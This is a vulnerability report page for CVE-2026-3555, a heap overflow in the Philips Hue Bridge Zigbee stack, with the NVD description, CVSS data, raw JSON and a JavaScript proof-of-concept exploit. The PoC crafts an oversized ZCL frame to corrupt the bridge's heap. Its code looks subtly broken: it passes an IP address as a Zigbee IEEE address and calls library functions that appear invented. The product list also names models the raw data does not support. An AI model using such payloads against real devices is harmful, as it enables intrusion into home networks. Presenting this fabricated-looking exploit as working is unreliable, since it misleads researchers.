Security Vulnerability Report
CVE-2026-3555 CVSS 8.0 HIGH

CVE-2026-3555

Published: 2026-03-16 14:19:48
Last Modified: 2026-04-27 14:50:08

Description

Philips Hue Bridge Zigbee Stack Custom Command Handler Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Philips Hue Bridge. User interaction is required to exploit this vulnerability in that the user must initiate the device pairing process. The specific flaw exists within the handling of custom Zigbee ZCL frames in the Model Info download functionality. The issue results from the lack of proper validation of the size of data prior to copying it to a fixed-size heap buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28276.

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:philips:hue_bridge_v2_firmware:*:*:*:*:*:*:*:* - VULNERABLE (versionEndExcluding: 1975170000)
cpe:2.3:h:philips:hue_bridge_v2:-:*:*:*:*:*:*:* - NOT VULNERABLE
Philips Hue Bridge (BSB002) - firmware versions older than the latest security update
Philips Hue Bridge (BSB001) - all known versions
Philips Hue Bridge 2200/2246 - all known versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2026-3555 PoC - Philips Hue Bridge Zigbee Heap Buffer Overflow
// This PoC demonstrates the heap buffer overflow in Zigbee ZCL frame handling
// Note: This is for educational purposes only
const zigbee = require('zigbee-herdsman');

async function exploitHueBridge(targetIP) {
  console.log('[+] CVE-2026-3555 PoC for Philips Hue Bridge');
  console.log('[+] Target:', targetIP);

  // Connect to target Hue Bridge
  const device = await zigbee.Device.create({
    ieeeAddr: targetIP,
    networkAddress: 0x0000,
    modelId: 'BSB002',
    manufacturerName: 'Philips'
  });

  // Craft malicious ZCL frame with oversized data
  // The ZCL frame triggers Model Info download functionality
  const maliciousZCLFrame = {
    frameControl: 0x00,
    clusterId: 0xFC00,                 // Philips specific cluster
    commandId: 0x02,                   // Custom command for Model Info download
    payload: Buffer.alloc(512, 0x41),  // Overflow data - exceeds heap buffer
    manufacturerCode: 0x100B,
    sequenceNumber: 0x01
  };

  console.log('[+] Sending malicious ZCL frame...');
  try {
    // Send the crafted frame to trigger overflow
    await device.sendZclFrame(maliciousZCLFrame);
    console.log('[+] Malicious frame sent');
    console.log('[+] If vulnerable, heap corruption should occur');
  } catch (error) {
    console.log('[-] Error:', error.message);
  }
}

// Usage: node cve-2026-3555-poc.js <target_ip>
exploitHueBridge(process.argv[2] || '192.168.1.100');
```

References

https://www.zerodayinitiative.com/advisories/ZDI-26-153/ (Third Party Advisory, ZDI-26-153)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-3555", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:48.493", "lastModified": "2026-04-27T14:50:08.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Philips Hue Bridge Zigbee Stack Custom Command Handler Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Philips Hue Bridge. User interaction is required to exploit this vulnerability in that the user must initiate the device pairing process.\n\nThe specific flaw exists within the handling of custom Zigbee ZCL frames in the Model Info download functionality. The issue results from the lack of proper validation of the size of data prior to copying it to a fixed-size heap buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28276."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por desbordamiento de búfer basado en montículo en el gestor de comandos personalizado de la pila Zigbee de Philips Hue Bridge. Esta vulnerabilidad permite a atacantes adyacentes a la red ejecutar código arbitrario en instalaciones afectadas de Philips Hue Bridge. Se requiere interacción del usuario para explotar esta vulnerabilidad, ya que el usuario debe iniciar el proceso de emparejamiento del dispositivo.\n\nLa falla específica existe dentro del manejo de tramas Zigbee ZCL personalizadas en la funcionalidad de descarga de información del modelo. El problema resulta de la falta de validación adecuada del tamaño de los datos antes de copiarlos a un búfer de montículo de tamaño fijo. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del dispositivo. Fue ZDI-CAN-28276."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:philips:hue_bridge_v2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1975170000", "matchCriteriaId": "C4C925A5-D9FB-482D-A98D-F879B1BD21EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:philips:hue_bridge_v2:-:*:*:*:*:*:*:*", "matchCriteriaId": "55B37D18-3A59-423E-9D73-F80DFDB14C4D"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-153/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
```